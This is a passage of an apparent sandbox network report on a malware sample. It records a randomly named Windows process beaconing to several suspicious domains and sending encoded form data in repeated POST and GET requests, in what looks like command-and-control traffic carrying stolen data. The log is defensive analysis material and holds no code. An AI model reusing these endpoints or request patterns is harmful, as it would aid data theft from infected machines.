              Sep 6, 2024 09:06:24.735851049 CEST | 1032 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:06:24 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              19 | 192.168.2.6 | 49747 | 65.21.196.90 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:26.621428967 CEST | 1831 | OUT | POST /i28e/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030002721.xyz
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030002721.xyz
              Referer: http://www.030002721.xyz/i28e/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR= [TRUNCATED]
              Sep 6, 2024 09:06:27.322665930 CEST | 1032 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:06:27 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              20 | 192.168.2.6 | 49748 | 65.21.196.90 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:29.164484978 CEST | 531 | OUT | GET /i28e/?yXghy=KTox&FR=aGpxVX6kGAU+vZyZZfJTCDz7/lPsBFWDos3dY6ZsNYZMPz7BIFF7kPeLI34j35LFjHkoTmJm1HUVC8sGZtVHFfldRMYhCGprZu/MBi0oweQaoGEXOF433+gvsUsQ2wF2VEo07O8= HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.030002721.xyz
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:29.840902090 CEST | 1032 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:06:29 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              21 | 192.168.2.6 | 49749 | 184.94.212.115 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:34.933149099 CEST | 794 | OUT | POST /so9n/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.lumixy.online
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.lumixy.online
              Referer: http://www.lumixy.online/so9n/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=pdYz3v1XLuHLNDs5mV+xFXV1mnqFVXJfNZnyDVzOqKc4g0CMirblU8Ayi4rDeDdzpM/YW7ydO+CB6DDJw3ydGIwzPyyTN5cLmw4PU3XsuYDi0DyPNwV/Xn5RSj8q6+sEkU8qBIw+EE4P2CvUHn2LAPSmdYL5RIaKA3uHD9Ie5Sm7zdS4F7BuasiOir8zr8iNm5TgzXqfXkIC
              Sep 6, 2024 09:06:35.510173082 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:06:35 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              22 | 192.168.2.6 | 49750 | 184.94.212.115 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:37.482142925 CEST | 818 | OUT | POST /so9n/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.lumixy.online
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.lumixy.online
              Referer: http://www.lumixy.online/so9n/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=pdYz3v1XLuHLOgk5k0+xA3V2pHqFf3JbNZjyDQTeq4o4gVyMjvHlX8AypYrGdzdCpM72W7edO+WB6HHJlR6eF4w1GSzVJ5cLmw4PU3C7uYbi1wqPMVhwfH5SVj8q++sAkU8YBNQYEHAP2A3UH0uMJPSgDoKRXITVFR/BC8QaqBua7LTiZIBNI8CMipkBrcink5rghAm4YQthXUwDtuaPjJgqi38GlzcaLA==
              Sep 6, 2024 09:06:38.151392937 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:06:37 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              23 | 192.168.2.6 | 49751 | 184.94.212.115 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:40.027431011 CEST | 1831 | OUT | POST /so9n/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.lumixy.online
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.lumixy.online
              Referer: http://www.lumixy.online/so9n/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR= [TRUNCATED]
              Sep 6, 2024 09:06:40.600023031 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:06:40 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              24 | 192.168.2.6 | 49752 | 184.94.212.115 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:42.567337036 CEST | 531 | OUT | GET /so9n/?FR=kfwT0b19IOKcOFwPtUe9Dwhdq1KCUnZZUdvJW1zli8UTkV27q7a5c8UKgIiCSTwlp8ToQZ+GSYiqoCrUiDCARooQABC7bvQsg0wobGai6LL68ECzCx14NnY8N25SgLExp3s5W9s=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.lumixy.online
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:43.148684025 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:06:43 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              25 | 192.168.2.6 | 49754 | 91.215.85.23 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:48.561974049 CEST | 788 | OUT | POST /pf98/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.kalomor.top
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.kalomor.top
              Referer: http://www.kalomor.top/pf98/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=6hpjfjuzN52TUiRyFfhGCXpBJ1WhYUdxjar3GyzUL/pdGjatxPKaDoM+QNwA4rQhiK+jQC9ryY00Rh5iPUcjH/ItlZVbYjgb0xT4SYOByc5zLDXZOshrgO9+HO4m2yqye2oWl1g0CLHlvok3Z4ry3qbIVTp5y5dw33Be3QBwpBqz5G1vzhWWIrJusfG2l575uzPMWGv6zN56
              Sep 6, 2024 09:06:49.258800030 CEST | 711 | IN | HTTP/1.1 405 Not Allowed
              Server: nginx/1.26.2
              Date: Fri, 06 Sep 2024 07:06:49 GMT
              Content-Type: text/html
              Content-Length: 559
              Connection: close
              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              26 | 192.168.2.6 | 49755 | 91.215.85.23 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:51.107414007 CEST | 812 | OUT | POST /pf98/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.kalomor.top
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.kalomor.top
              Referer: http://www.kalomor.top/pf98/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=6hpjfjuzN52TGSNyG/dGD3pCFVWhW0d1ja33GzHEed9dGGmtwLmaAoM+ftwB8rRtiKCFQHFrybI0Rk9iIjosGvIvwJVZADgb0xT4SYy7ychzLznZMNhkqu9/Pu4m7Sq2e2o0lxhRCIzlvqM3atHxgabCKDoYicAStVAt0jBXwx2IxQ01vSW1a7pssdeElZ7Tsz3MERjd85cZ9Lh2X2W2dr7J+8SOLDGa+g==


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              27 | 192.168.2.6 | 49756 | 91.215.85.23 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:53.652947903 CEST | 1825 | OUT | POST /pf98/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.kalomor.top
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.kalomor.top
              Referer: http://www.kalomor.top/pf98/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR= [TRUNCATED]
              Sep 6, 2024 09:06:54.344257116 CEST | 711 | IN | HTTP/1.1 405 Not Allowed
              Server: nginx/1.26.2
              Date: Fri, 06 Sep 2024 07:06:54 GMT
              Content-Type: text/html
              Content-Length: 559
              Connection: close
              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              28 | 192.168.2.6 | 49757 | 91.215.85.23 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:56.192811012 CEST | 529 | OUT | GET /pf98/?FR=3jBDcWbmLrShHmxnPMFZKghCFWWefh1Z2LPMDwvUTpx/DkKazbfgKbcBR8lW4oJr2d6xPk4dsMQJMRxiEW07CNh+pZ1lAg0Z7H/dVeHhjsdFGVPZJstcy8xxVNZ/uGWZUGk7w1E=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.kalomor.top
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:56.875104904 CEST | 1236 | IN | HTTP/1.1 200 OK
              Server: nginx/1.26.2
              Date: Fri, 06 Sep 2024 07:06:56 GMT
              Content-Type: text/html
              Content-Length: 15793
              Last-Modified: Thu, 15 Aug 2024 13:57:27 GMT
              Connection: close
              ETag: "66be0947-3db1"
              Accept-Ranges: bytes
              Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-align:center; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; color: #027baa"> <img src="data:image/png;base64, [TRUNCATED]
              Data Ascii: U3Cxwvahf38j3zWbJmn7VxsOZUm+3YJYJi6AFZmzDOvNvTP2Q60zm9M8Q/k5iOMPnot1t6XwypWxwXKLVdCBDrMLcUwzfb5nfm+bj0kQY3hT2Vzyp6mstzasLKEph4povShxgM66OtVy8IE6EUlWebuVM3DL/SOnHJjwEYS5rOmCum8OeSdYibnSVraOONTS3aaCbetu2kN4CrsuODw3t/44EfYpNO5+puxkpffVbP5+yIY5meP
              Sep 6, 2024 09:06:56.880250931 CEST1236INData Raw: 59 75 36 61 54 38 65 6e 69 62 62 7a 2f 79 78 45 72 47 30 58 45 64 33 45 57 53 37 61 65 35 56 50 63 71 41 53 36 68 33 49 6f 4d 4c 45 5a 4b 61 65 36 62 6f 58 62 50 46 59 4e 41 6d 64 57 48 57 4c 6f 33 43 6e 7a 58 70 48 74 30 34 77 2b 41 65 78 64 57
              Data Ascii: Yu6aT8enibbz/yxErG0XEd3EWS7ae5VPcqAS6h3IoMLEZKae6boXbPFYNAmdWHWLo3CnzXpHt04w+AexdW4HVxIy5LswOggLgc8HaTBkPkyxeHAVG81g1OM+nPo7uDZqTqZ19CXP3NGWQwp/VzGP4Fvr9d/T/gqHxZb5gwPtw1vWxjSIuWEJI4LEBYtkQuLIZglI2+lVW9U6UDV3ksWpQ0cgPVMmPm0vZ4MYzquRHGju2svRcLl


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              29 | 192.168.2.6 | 49758 | 121.199.37.19 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:02.758654118 CEST | 785 | OUT | POST /uq6q/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.henrry.top
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.henrry.top
              Referer: http://www.henrry.top/uq6q/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              30 | 192.168.2.6 | 49759 | 121.199.37.19 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:05.315206051 CEST | 809 | OUT | POST /uq6q/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.henrry.top
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.henrry.top
              Referer: http://www.henrry.top/uq6q/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:06.426810980 CEST | 94 | IN | HTTP/1.1 200 OK
              Date: Fri, 06 Sep 2024 07:07:06 GMT
              Content-Length: 0
              Connection: close


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              31 | 192.168.2.6 | 49760 | 121.199.37.19 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:07.855396986 CEST | 1822 | OUT | POST /uq6q/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.henrry.top
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.henrry.top
              Referer: http://www.henrry.top/uq6q/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:09.026575089 CEST | 94 | IN | HTTP/1.1 200 OK
              Date: Fri, 06 Sep 2024 07:07:08 GMT
              Content-Length: 0
              Connection: close


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              32 | 192.168.2.6 | 49761 | 121.199.37.19 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:10.396234035 CEST | 528 | OUT | GET /uq6q/?FR=9Otm+20UpUikA6x0VD212tqxG3jyIPcWfHFyJTdbxKGeDxDVLjdT/4jyPXypOz+d9yZQrKELvtj6jM/m3RUo26f0zJnEKMWuurbJZWWdFjqlgtWZigu2A/olrWAWySRFQjrMuco=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.henrry.top
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:11.579998016 CEST | 94 | IN | HTTP/1.1 200 OK
              Date: Fri, 06 Sep 2024 07:07:11 GMT
              Content-Length: 0
              Connection: close


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              33 | 192.168.2.6 | 49762 | 188.114.96.3 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:16.949395895 CEST | 806 | OUT | POST /4jz5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.1win-moldovia.fun
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.1win-moldovia.fun
              Referer: http://www.1win-moldovia.fun/4jz5/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:17.619527102 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:07:17 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1x2%2BpCmcGTg2AG9xhsfwb193NvJ2wC45Dhc0HPu73UdNHzQpMhmpOnY5pvxy3y1U66GANiXpCYFFdKh%2BxwE0oNu8%2BCSvm0HMWTlB%2BpGB73UvKJNDMu%2F0lV6w6pv7%2FZJInOnqB8Dzog%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bec9f097d937c6c-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              34 | 192.168.2.6 | 49763 | 188.114.96.3 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:19.497196913 CEST | 830 | OUT | POST /4jz5/ HTTP/1.1
